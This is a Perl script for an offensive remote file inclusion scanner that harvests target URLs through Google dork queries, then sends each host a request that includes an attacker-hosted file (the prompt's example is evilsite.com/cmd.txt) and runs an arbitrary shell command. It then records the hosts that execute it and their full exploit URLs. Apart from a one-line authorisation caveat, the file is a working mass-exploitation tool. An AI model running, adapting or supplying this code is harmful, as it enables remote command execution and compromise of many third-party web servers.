#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Remote File Include Vuln list scanner by L0s3r 4n71_D3f14n7
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Coded in perl.
#This program is quite simple, but has quite a few useful tools built in. The basic script requires 2 args,
#cmd and list. These 2 options are all that are needed to run it. An optional tool is the google query tool,
#which returns the urls of a specified search string (dork). The google query tool also has the option -s
#that specifies a string to search each url for, and then saves the url up to and including the string you specified.
#This is very useful if you're looking for a vulnerable piece of software that is normally installed into a standard directory
#like /calogic/ etc. Once the urls are stored, the program sends the requests one by one, and returns the results.
#For ease of use and readability, the vulnerable sites are also stored in a text file called results.txt in the
#working dir. For the google search functionality you will need a google web api key, which is free, and will
#also need to have SOAP::Lite installed along with the google api kit. Remember though that the google
#functionality is only optional. Every host in the list receives real attack traffic, so only run this against
#systems you are authorised to test.
use Getopt::Std;
use LWP::UserAgent;
use SOAP::Lite;
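# Your Google API developer's key. Read it from the environment when set so
# the key does not have to live in the source file; the literal below is only
# a placeholder and will not authenticate.
my $google_key = defined $ENV{GOOGLE_API_KEY} ? $ENV{GOOGLE_API_KEY} : 'get your own key';
# Location of the GoogleSearch WSDL file.
my $google_wdsl = "./GoogleSearch.wsdl";
# Switches: -c command, -l host list file, -d google dork, -s url search string.
# getopts() returns false on an unknown switch; that was silently ignored before.
getopts("c:l:d:s:") or usage();
$cmd    = $opt_c;
$list   = $opt_l;
$dork   = $opt_d;   # google dork
$search = $opt_s;   # search string to parse urls
$|++;               # unbuffered stdout so the per-host progress dots show up at once
# Scheme prepended to every host read from the list. dork() clears it because
# the urls it writes to list.txt already carry http://.
$pre = "http://";
# The google query runs first so it can build the host list, then the banner,
# then we bail out with usage when either required switch is missing.
if ($dork) { dork(); }
top();
if (!$cmd || !$list) { usage(); }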
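#get user supplied file inclusion path for exploit and get cmd var
# Read the two interactive answers from STDIN explicitly: the magic <> handle
# would instead try to open any word left over in @ARGV after getopts as a file.
print "File Inclusion Path? ie:/cart.php?cart_root=http://evilsite.com/cmd.txt?\n";
$exploit = <STDIN>;
die "\nNo file inclusion path given\n" unless defined $exploit;
chomp($exploit);
print "Remote command variable?. Or hit enter for default(&cmd=)";
$var = <STDIN>;
$var = "" unless defined $var;
chomp($var);
if (!$var) { $var = "&cmd="; }
print "Working, please wait";
# Read the host list one host per line, send one request per host and keep
# each body so the report loop below can grade it after the scan.
# NOTE(review): this sends attack traffic to every host in the list; only run
# it against systems you are authorised to test.
my $i = 0;
open(my $input, '<', $list) or die "\nCannot open host list $list: $!\n";
# One agent for the whole scan; nothing about it changes between hosts.
$browser = LWP::UserAgent->new() or die "\nCould not create user agent\n";
$browser->timeout(10);
$browser->agent('Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)');
while (my $line = <$input>)
{
    $host = $line;
    $host =~ s/\s+\z//;          # chomp, plus any stray CR from a Windows-edited list
    next if $host eq '';         # a blank line would otherwise request "http://" + path
    # "echo enthrax;" is prepended to the command so the report can verify
    # execution by looking for the marker at the start of the body. $cmd is
    # appended to the url exactly as typed, without any url-encoding.
    $request = HTTP::Request->new(GET => $pre.$host.$exploit.$var."echo enthrax;".$cmd)
        or die "\nCould not build request\n\n\n";
    $response = $browser->request($request);
    $contents[$i] = $response->content;
    print ".";
    #array for host display on results page
    $hostarray[$i] = $host;
    $i += 1;
}
close($input);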
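#this area of code displays the results of the scan.
print "\n\n";
# Persist the vulnerable hosts too; fail loudly instead of silently losing
# the report when the working dir is not writable.
open(my $report, '>', "results.txt") or die "\nCannot write results.txt: $!\n";
# Walk the hosts in list order (the original counted $i back down, so the
# last host scanned was printed first).
for my $j (0 .. $#hostarray)
{
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
    print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
    # The request prepended "echo enthrax;" to the command, so a body that
    # starts with the marker means the included file was executed. Anchoring
    # at offset 0 rather than "anywhere in the body" keeps a page that merely
    # reflects the request url from being flagged; the trade-off is a miss
    # when the target emits anything (whitespace, html) before the include runs.
    if (defined $contents[$j] && index($contents[$j], "enthrax") == 0) {
        print "\nResults for host ".$hostarray[$j];
        print "\n\n**************Vulnerable**************\n\n";
        print "Results of your command:\n";
        print substr($contents[$j], 0, 100);   ####You can change this number to display more text
        # Show the url with its scheme, as it was actually requested.
        my $url = $pre.$hostarray[$j].$exploit.$var.$cmd;
        print "\n\nThe full exploit url is:\n".$url;
        print {$report} $hostarray[$j]." is vulnerable!!!!!!!!\n";
        print {$report} "The full exploit url is:\n".$url."\n\n";
    } else {
        print "\nResults for host ".$hostarray[$j];
        print "\nNot Vulnerable. Better luck next time.";
        print "\nReceived data for diagnosis:\n";
        print substr($contents[$j], 0, 50) if defined $contents[$j];   ####You can change this number to display more text
    }
    #to make it look more legible
    print "\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r";
    print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\r";
}
# Buffered write errors only surface at close, so check it.
close($report) or die "\nError writing results.txt: $!\n";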
# Print the three-line banner shown before the scan starts.
sub top()
{
    my @banner = (
        "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~",
        " Remote File Include Vuln list scanner by L0s3r 4n71_D3f14n7",
        "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~",
    );
    print map { "$_\r\n" } @banner;
}
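# Print the switch summary and exit. Each switch is followed by a placeholder
# for the value it takes (the original listed the descriptions with no switch
# names, so they could not be matched up). -s only has an effect together
# with -d, since it is consulted only while parsing google results.
sub usage()
{
    print "script.pl -c CMD -l LIST [-d DORK [-s STRING]]\r\n\r\n";
    print " -c CMD    - cmd to be executed\r\n";
    print " -l LIST   - location of txt file with hosts. Leave off the http://\r\n";
    print " -d DORK   - Dork to search for.\n";
    print " -s STRING - String in URL to search for and once its found, it deletes the rest of the url past the string.\n";
    exit();
}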
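# Query Google for $dork and write the matching urls to list.txt, which the
# user is expected to hand back in as -l. When -s is set, each url is cut
# right after the first occurrence of that string so only the install
# directory survives. Side effect: clears $pre, because urls returned by
# google already carry their scheme.
# NOTE(review): this talks to Google's SOAP search API via GoogleSearch.wsdl,
# which Google retired long ago; expect the call to fail against the live
# service unless it is pointed at a compatible endpoint.
sub dork()
{
    print "\nPlease wait... Querying Google.";
    # Each request returns at most 10 hits, so page through $loops * 10.
    my $loops = 4;
    $pre = "";
    # Create a new SOAP::Lite instance, feeding it GoogleSearch.wsdl.
    my $google_search = SOAP::Lite->service("file:$google_wdsl");
    # Save hosts to the text file; die rather than silently writing nowhere.
    open(my $out, '>', "list.txt") or die "\nCannot write list.txt: $!\n";
    for (my $offset2 = 0; $offset2 <= ($loops-1)*10; $offset2 += 10)
    {
        my $results = $google_search->doGoogleSearch(
            $google_key, $dork, $offset2, 10, "true", "", "false",
            "", "latin1", "latin1"
        );
        # Stop paging once a response carries no result elements instead of
        # spending the remaining queries on empty pages.
        my $hits = $results && $results->{resultElements};
        last unless $hits && @$hits;
        foreach my $result (@$hits)
        {
            my $url2 = $result->{URL};
            if ($search) {
                # Keep the url only up to and including the -s string.
                my $at = index($url2, $search);
                if ($at != -1) {
                    print {$out} substr($url2, 0, $at + length $search), "\n";
                }
            } else {
                print {$out} $url2, "\n";
            }
        }
    }
    close($out) or die "\nError writing list.txt: $!\n";
    print "\nGoogle Search retrieved urls in list.txt- edit if needed then hit enter.\n";
    # Read the pause from STDIN explicitly; <> would try to open leftover @ARGV words.
    my $z = <STDIN>;
}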